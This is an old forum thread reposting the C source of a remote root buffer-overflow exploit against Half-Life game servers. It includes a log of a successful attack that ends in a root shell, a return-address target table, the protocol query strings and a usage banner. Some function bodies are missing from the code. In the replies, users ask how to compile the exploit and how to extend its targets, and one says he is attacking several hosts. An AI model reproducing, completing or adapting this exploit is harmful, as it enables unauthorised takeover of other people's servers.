hk-vig and wsxz (priv8security.com) published a high risk confidential remote root exploit (if running by root) against Halflife <= 1.1.1.0 (including all mods like CS, DoD) and dedicated server 3.1.1.1c1/4.1.1.1a. Exploitation successfully tested on FreeBSD.This code is based upon the recent halflife exploit but it is not a DoS. Instead this exploit provides you a nice shell to the vulnerable host.
CODE
// // PRIV8 SECURITY & UHAGr CONFIDENTIAL SOURCE - DO NOT DISTRIBUTE !!! // Halflife <= 1.1.1.0 , 3.1.1.1c1 and 4.1.1.1a exploit // Code by hkvig of UHAGr and wsxz of Priv8 Security // // This code is based upon the recent halflife exploit but it is // not a dos. Instead this exploit provides you a nice shell to // the vulnerable host // // // LOGS OF SUCCESSFUL EXPLOITATION // // [wsxz@localhost xdcc]$ ./hl 0 192.168.0.4 // // // PRIV8 SECURITY & UHAGr CONFIDENTIAL EXPLOIT - DO NOT DISTRIBUTE !!! // Halflife <= 1.1.1.0 , 3.1.1.1c1 and 4.1.1.1a exploit // Code by hkvig of UHAGr and wsxz of Priv8 Security // Greetings to #priv8security & #!uhagr people // // [+] Looking up host ip addr // [+] Establishing virtual udp connection // [+] Getting server info // [+] Server protocol 0x2e // Players 0 // Proxy 0 // Lan 0 // Nplayers 0x10 // Directory cstrike // Description CounterStrike // Host Counter-Strike 1.5 Server // Type 0 // Pass 0 // Os 0 // Security 0x1 // [+] Getting server challenge integer // Server challenge is 280135011 // [+] Exploiting halflife server // [+] Connecting to our shell // Linux freebsd.rlz 2.4.2 FreeBSD 5.1-RELEASE #0: Thu Jun 5 02:55:42 GMT 2003 // root@wv i386 unknown // uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) // // // Greetings fly to // - The rest UHAGr and Priv8 Security people // - CCC // - All of our friends to any net // #include <stdio.h> #include <stdlib.h> #include <string.h> #include <signal.h> #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> #include <linux/socket.h> #include <linux/sockios.h> #include <netinet/in.h> #include <netdb.h> #include <unistd.h> #include <errno.h>
// The structure that holds the server info needed for the exploitation struct serverinfo { unsigned int protocol; // Protocol version unsigned int players; // Current players unsigned int proxytarget; // Proxy unsigned int lan; // Lan unsigned int nplayers; // Players char *directory; // Current directory char *description; // Server description char *host; // Hosts alias char *challenge; // Challenge integer unsigned int type; // Server type unsigned int pass; // Server pass unsigned int os; // Os unsigned int security; // Security } server;
// The structure that contains the targets struct target { unsigned int id; const char *description; unsigned long int retaddr; } targets[] = { { 0 , "Freebsd 5.1" , 0xbfbfe398 } ,
{ 1 , "DoS attack to every OS" , 0x41414141 } ,
{ 2 , NULL , 0 } };
// This function lists the available targets void list( void ) { int loop = 0;
// This function is responsible for the proper error reporting and // error code returning void do_exit( const char *str , const char *file , unsigned int line ) { fprintf( stdout , "\n" ); if( file != NULL && line != 0 ) fprintf( stdout , "Error at %s at line %d\n" , file , line );
if( str != NULL ) perror( str );
exit( -errno ); }
// A safer version of the standard strtok() function char *strtokerr( char *str , const char *del ) { char *ptr;
if(( ptr = strtok( str , del )) == NULL ) { fprintf( stdout , "Error at %s at line %d\n" , __FILE__ , __LINE__ ); fprintf( stdout , "strtokerr(): strtok(): No such token\n" ); do_exit( NULL , NULL , 0 ); }
return ptr; }
// This function is responsible for looking the ip addr of the target host unsigned long int lookup_host( char *host ) { struct in_addr r_host; struct hostent *ip;
// This function establishes a virtual udp connection to the target // host so that send() can be used instead of sendto() int udp_connect( unsigned long int addr , unsigned int port ) { int fd; struct sockaddr_in host; struct in_addr n_addr = *(( struct in_addr *)&addr );
// This function gets the server info needed for the exploitation and checks // if the host is vulnerable int server_info( int fd ) { char infostr[] = "\xff\xff\xff\xffinfostring\n\0"; char buffer[BUFFER_SIZE]; char *ptr; int loop , bytes;
// This function is responsible for getting the server's challenge in order // to be used later into the exploitation udp packet int server_challenge( int fd ) { char challstr[] = "\xff\xff\xff\xffgetchallenge\n\0"; char buffer[BUFFER_SIZE];
// This function is responsible for exploiting a bsd host int do_bof_bsd( int fd , struct target targ , unsigned long int offset ) { char *exploit , *ptr; int len;
int main( int argc , char *argv[] ) { unsigned long int addr; long int offset; int fd , usrtarg , port;
fprintf( stdout , " \n\n" "PRIV8 SECURITY & UHAGr CONFIDENTIAL EXPLOIT - DO NOT DISTRIBUTE !!! \n" "Halflife <= 1.1.1.0 , 3.1.1.1c1 and 4.1.1.1a exploit \n" "Code by hkvig of UHAGr and wsxz of Priv8 Security \n" "Greetings to #priv8security & #!uhagr people \n\n" );
if( argc != 4 && argc != 5 ) { fprintf( stdout , "Usage: %s <Target id> <Host> <Offset> [<Server port>]\n\n" "Set offset to 0 if you don't like to use an offset\n\n" , argv[0] ); list(); return 0; }
if( argc == 5 ) { port = atoi( argv[4] ); fprintf( stdout , "[+] Using port %d\n" , port ); } else port = DEST_PORT;
Just realized its in the file downloads section compiled. Thanks for the code:)
fUSiON
Aug 28 2003, 02:49 AM
is this working for RedHat 9.0 too ?, Sorry for this noob question..
how to compile it ? gcc /home/user/file ??
Thx
spoilt_jesus
Sep 4 2003, 01:33 AM
Dear fUSiON, this exploit only spawns a shell on fbsd 5.1 (you can DoS any OS) but you can add as many targets as you want ;] there is a newer version of this code that includes targets for most of the linux distros. that's all thnx
www.UHAGr.org
Yorn
Sep 5 2003, 06:57 AM
QUOTE
there is a newer version of this code that includes targets for most of the linux distros.
Till there is one that spawns remote shell on XP or 2000 this exploit is basically dead in the water.
spoilt_jesus
Sep 5 2003, 01:59 PM
Dear Yorn, i think the code for win is only for hl client not the server... nevermind i'm not sure.i only know for the code that we coded.. cu
Yorn
Sep 7 2003, 10:00 AM
QUOTE (spoilt_jesus @ Sep 5 2003, 01:59 PM)
Dear Yorn, i think the code for win is only for hl client not the server... nevermind i'm not sure.i only know for the code that we coded.. cu
looks like it does a buffer overflow, right? Maybe I'm looking at it wrong.
If only FreeBSD and *nix OSs are exploitable, that'd be kind of odd. Usually with these kinds of thing you just need a different kind of payload to get an NT or 2000 machine to buckle and drop shell.
Maybe I'm wrong though.
p3nGu1n
Sep 7 2003, 03:11 PM
This exploit wont work for me. The dos doesn't do anything at all and most of the time the number to gain cmd crashes the server. I get Error at half-life.c at line 284 tcp_connect(): connect(): Connection refused
Does this mean that my server is secure? I even tried it on freebsd.
Divx_dude
Sep 7 2003, 03:26 PM
whats the meaning of this exploit?
azazel
Sep 9 2003, 05:09 AM
QUOTE (Divx_dude @ Sep 7 2003, 03:26 PM)
whats the meaning of this exploit?
Well posibilities are endless once you successfully gain root on the box.. I havent been able to get a shell yet.. but im working on several hosts..
btw.. if anyone knows the ret addresses for other unix versions.. I'd really appreciate it..
Regards
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
